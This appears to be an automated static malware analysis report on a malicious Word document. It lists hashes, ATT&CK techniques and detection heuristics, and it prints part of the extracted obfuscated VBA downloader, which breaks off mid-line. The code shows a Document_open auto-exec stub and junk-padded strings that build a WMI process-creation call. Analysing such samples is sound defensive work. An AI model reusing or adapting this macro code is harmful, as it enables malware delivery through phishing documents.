Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ccd9b3408b9ff3cc…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 200.8 KB
Created: 2020-08-19 06:42:00
Authoring application: Microsoft Office Word
First seen: 2020-09-07
MD5: 542e58f76cab6111ec59b8f33df0c8a3
SHA-1: 0be6b58fa4a7c4c544e15a33ac999209d9904d08
SHA-256: ccd9b3408b9ff3cc39de0b2dc3157e6781bb8938aa166b1673ef9df3016c30eb
Risk Score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro and a hidden UserForm command stager, which are indicative of a downloader. The presence of the ClamAV detection 'Doc.Downloader.Generic-9389669-0' further supports this. The VBA code attempts to obfuscate its actions by using string concatenations and conditional logic, but the overall intent appears to be the execution of a secondary payload.

Heuristics (7)

  • ClamAV: Doc.Downloader.Generic-9389669-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-9389669-0
  • VBA macros detected [medium; 4 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager [critical] (OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER)
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15410 bytes
SHA-256: d826f9c1c2cfbf2575c8d89d0733054f4da9e3ea730e930654caaa68d006bec8

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Ozcfzttiyn1hn5nhh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Ll53rsfrsrw1ncz8.Wjd61wsdocdl9_xcr
End Sub


Attribute VB_Name = "Ll53rsfrsrw1ncz8"
Attribute VB_Base = "0{D6456B62-EA8A-429F-A64F-15D03B55C94D}{818EFAA9-1CAB-4356-8DBD-201A26247004}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Wjd61wsdocdl9_xcr()
   Rlbnswhdjemx = "727"
If Len("Wjjhm_jqwfz6i69fI4vvfkvkt9x8ng") = Len("X08_7_4m32cgntj2k9") + 1 Then End
If Len("Utbbz0y84cwti_10kYkrtq56deh3jhn0uopXhahcakfi5hxu_3ly") < Len("Gcihw6qft7iuz") Then
        MsgBox "Hen39cotgywk9ui" + "Kblhemw1vf29r"
        MsgBox ("Xzewmpxaow028v")
        MsgBox "I988jqhirr0txg4" + "Lb429fmh4xpy1"
End If
If Len("Kqaeki6ai91qDo8_5wkszd6yfwzd") = Len("Btticsst8urp46a") Then
       MsgBox "Nh58xvcp21mgrew" + "Xx8h8pc7or8b"
       MsgBox ("C8j5fxp7h0qrdsngl !!!")
       MsgBox "U9lsg95wde9" + "Ezbwx4cmlrhk1yq"
End If

A3t259mb4jv540m = Ll53rsfrsrw1ncz8.HelpContextId + 50 + 50
   Ibfxd14mt4i59 = "130"
If Len("I72kchso4rmy0n6x3V4rfjulb3vvk69o") = Len("Pax24r49jzl") + 1 Then End
If Len("Tps7awaekgxg0bX5sxoj935ab5naWuj6kmczki9j2pn") < Len("U3a7d3c8g5yz60") Then
        MsgBox "Qe1ld9d3e5eior_gm" + "Ojbmeresmyryo6"
        MsgBox ("Lkfbektya8b_t")
        MsgBox "Lhxlikz2l_jhvvpl" + "Lk99h6figbwbqc"
End If
If Len("P48r5nfuw10f49Yi1rwzw2jmrccjd1") = Len("X2w3z9rck1liiznlrd") Then
       MsgBox "I0r40cyfnkdls" + "Cjbl9kliom0ktaxe3w"
       MsgBox ("To8q0x1b4e4g !!!")
       MsgBox "Vieqmau5cdve5z" + "Qsisrf3wg4cyhis"
End If

Gvpkdsmih519 = ChrW(A3t259mb4jv540m + (15))
   Glrmpz9tup13 = "689"
If Len("Iln72_y0qtkYkcglxm1m1zs93") = Len("U37l1b_0udc0agj") + 1 Then End
If Len("Uh8so7nj4nb4xx790Wguiuo0ltdiymuX9kbke9pxsm") < Len("Fm8he_uldju") Then
        MsgBox "Ntcmkafbs121v8zm" + "T81in3_w7dy3i_xnyt"
        MsgBox ("Bvfxnltrvhwilinmn")
        MsgBox "Kf3d2o9rjj2em9o9j" + "Qkm96kppj6mu7y"
End If
If Len("Njn__52z8bj1rS6o0_1csrksymfce1") = Len("C64ya9ku7vp7v") Then
       MsgBox "Yuua0v89hb4dsls" + "Q4m8xwbb5qyq5sc"
       MsgBox ("S914vbgfrfy369q !!!")
       MsgBox "Bk0xuz9msths8rez0i" + "Ov1_vwgpr0jg8a"
End If

Ghfsqr2e6g9v89il = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Gvpkdsmih519 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Ll53rsfrsrw1ncz8.Q8m407jioxebgiht + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
   Hcigpx2t_c1 = "173"
If Len("Eb9q4lpglh8nxcqAo430o9an_dvxbinh") = Len("U8sagefg4df6") + 1 Then End
If Len("Ih8tvk9w4e8c5h5H_ufqltn_iyx3v5Np3n2txdju_4v0m9l") < Len("New1dbyttnwl6hkb") Then
        MsgBox "Kqq33mq77l14b72" + "Cb1j4m1zh_kr0"
        MsgBox ("Utto9r6834f5h102")
        MsgBox "M7_2fv42c12u3b" + "Yguhky9jqhk9d_e_2r"
End If
If Len("Vv00w01x72dm_2gBg2r5twuu7yz391adj") = Len("K_h9jubctm6k") Then
       MsgBox "Ydd5a_zk0pp2" + "A69adj2s385ir"
       MsgBox ("Urdhzvr3y68_du0pu4 !!!")
       MsgBox "Ztgfsjwuzfhj" + "Nc956h1f5jhceef"
End If

G_9zdll22036bu9x = Ayhrnk04u221(Ghfsqr2e6g9v89il)
   Cto4_0_nexji4vyx = "785"
If Len("Po4qnmylcp0dxiwwsW3a7ivxvziarbq") = Len("Vfc_h2h2r8takr") + 1 T
... (truncated)